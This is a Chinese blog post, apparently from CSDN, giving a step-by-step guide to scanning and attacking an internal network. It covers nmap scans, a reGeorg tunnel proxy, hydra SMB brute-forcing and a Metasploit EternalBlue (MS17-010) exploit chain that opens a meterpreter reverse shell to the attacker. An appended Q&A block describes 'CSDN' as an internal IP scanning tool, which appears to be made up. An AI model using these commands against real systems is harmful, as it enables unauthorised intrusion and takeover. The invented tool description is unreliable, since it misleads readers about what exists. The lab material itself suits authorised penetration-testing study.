内网拓展——端口扫描及端口漏洞扫描

端口扫描

思路:首先查看内网存活的主机,然后查看存活主机的开放端口

方法一:利用nmap工具

nmap.exe -sP 目标网段或指定ip

  

nmap 目标ip

  

方法二:通过代理,用外网的nmap进行扫描

1.上传regeo代理脚本tunnel.aspx到内网的dmz区

  

2.在攻击机上输入以下内容,通过regeorg代理内网的dmz机

python reGeorgSocksProxy.py -u http://192.168.240.50/tunnel.aspx

  

3.修改代理的配置文件

vim /etc/proxychains.conf

  

4.对目标机进行深度扫描

proxychains nmap -sT -Pn -p 80,445,3389 目标ip

  

方法三:s扫描器

1.上传s扫描器

2.查看端口,512是指线程

S.exe TCP 10.1.1.1 10.1.1.1 1-3000 512 

  

3.将扫描到的信息打印出来

S.exe TCP 10.1.1.1 10.1.1.1 1-3000 512 /BANNER

  

4.在当前目录下生成一个result文件,存放扫描的结果

S.exe TCP 10.1.1.1 10.1.1.1 1-3000 512 /save 

方法四:利用nc

扫描目标地址的ip

nc -nvv -w2 -z 目标ip 1-3000

  

方法五:可通过自写脚本进行扫描

php,python,perl,ruby,java,c等程序都可以用来做端口扫描,同时还可以使用bat或者shell脚本来做扫描

python脚本

#!/usr/bin/env python
 
import socket
 
def get_ip_status(ip,port):
    server = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
    try:
        server.connect((ip,port))
        print('{0} port {1} is open'.format(ip, port))
    except Exception as err:
        print('{0} port {1} is not open'.format(ip,port))
    finally:
        server.close()
 
if __name__ == '__main__':
    host = '10.0.0.11'
    for port in range(20,100):
        get_ip_status(host,port)

php脚本

$arr = [80,8080,3306];
foreach ($arr as $port) {
    $fp = @fsockopen('172.29.159.198',$port,$errno,$errstr,0.1);
    if (!$fp) {
        echo $port." closed\n";
    }else{
        echo $port." Opend\n";
    }
}

实验一:端口弱口令扫描

实验环境:kali和win3

实验步骤:

利用kali里的九头蛇工具

1.利用nmap查看目标机的端口

  

2.利用九头蛇hydra工具进行爆破

输入:

hydra -L user.txt -P pass.txt 192.168.240.135(目标ip) smb(爆破的服务名)

  

实验二:利用namp脚本

实验环境:kali和win3

实验步骤:

1.查看namp的位置,输入:whereis nmap

2.进入脚本所在位置:

脚本位置:/usr/share/nmap/scripts

  

3.过滤漏洞探测脚本

  

4.选择合适脚本进行攻击

nmap -p 445 --script smb-vuln-ms17-010.nse 目标机ip

  

实验三:端口漏洞扫描

实验环境:kali和win7

实验步骤:

利用kali中的msfconsole工具

1.输入msfconsole进入该工具

2.查看对应漏洞可利用的脚本

search 17_010

3.查看漏洞扫描脚本

use auxiliary/scanner

  

4.利用指定漏洞扫描内网中的机器

use auxiliary/scanner/smb/smb_ms17_010
show options
set rhosts 目标机ip/32
exploit

  

5.利用合适的exp进行攻击

use exploit/windows/smb/ms17_010_eternalblue
show options
set rhost 目标机ip

  

6.设置payload进行攻击

set payload windows/x64/meterpreter/reverse_tcp
show options
set lhost 攻击机ip
show options
exploit

  

  

  

 

  • 1
    点赞
  • 16
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
### 回答1: 内网IP扫描工具是一种用于扫描并识别内部网络中各个设备的工具。通常情况下,内网中的设备会被分配一个内部IP地址,以便在同一网络中进行通信。 CSDN(CSDN Internal IP Scanner)是一款功能强大的内网IP扫描工具,主要用于网络管理员或渗透测试人员进行内部网络安全评估和漏洞扫描。CSDN具有以下特点和功能: 1. 网段扫描:CSDN能够通过设置起始和结束的IP地址,扫描指定网络范围内的全部设备。管理员可以自定义扫描的IP范围,包括局域网中的所有主机。 2. 设备识别:CSDN能够探测并识别网络中的各类设备,如计算机、服务器、打印机、路由器等。它能够提供设备的基本信息,如IP地址、MAC地址、设备类型等,以便网络管理员了解网络拓扑结构。 3. 漏洞扫描:CSDN集成了多种漏洞扫描模块,能够自动检测和识别网络中存在的漏洞。它会对设备进行全面的扫描,包括开放端口、漏洞程序、弱口令等,以便管理员及时发现和修复潜在的安全威胁。 4. 安全提醒:CSDN提供实时的报告和告警机制,及时向管理员提供网络中发现的漏洞和安全隐患。管理员可以通过邮件、短信等方式接收到相关的警报,以便及时采取措施避免被攻击。 总而言之,CSDN是一款功能强大的内网IP扫描工具,能够帮助网络管理员或渗透测试人员全面了解内部网络的安全情况,并及时发现和修复潜在的漏洞和威胁。 ### 回答2: 内网IP扫描工具是一种用于扫描和识别内网中的设备的软件工具。它通过发送探测包到指定IP地址范围内的主机,并分析主机的响应来确定目标主机是否可用、开放的端口及其对应的服务等信息。 内网IP扫描工具通常被用于网络管理、安全审计等场景中。它能够帮助管理员发现内网中的未经授权的设备,识别潜在的安全风险,及时采取措施加强网络安全。同时,它也可以用于设备管理,帮助管理员跟踪控制内网设备的信息和状态。 常见的内网IP扫描工具有Nmap、Angry IP Scanner、OpenVAS等。这些工具通常提供了丰富的功能和高度可定制化的选项,使得管理员能够根据自身需求进行扫描操作。比如可以选择扫描目标的IP地址范围,指定探测包的类型和参数,设置扫描的时间间隔等。 然而,需要注意的是,内网IP扫描工具在使用时需遵循法律法规和道德规范,不能违反他人的隐私权和网络安全。因此,在使用这些工具时必须取得合法的授权,并且严格遵守相关的规定和约束。此外,随着网络安全形势的不断变化,内网IP扫描工具的功能和性能也不断更新和改进,因此,使用者需要持续关注新版本和安全补丁,以保持工具的有效性和安全性。

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值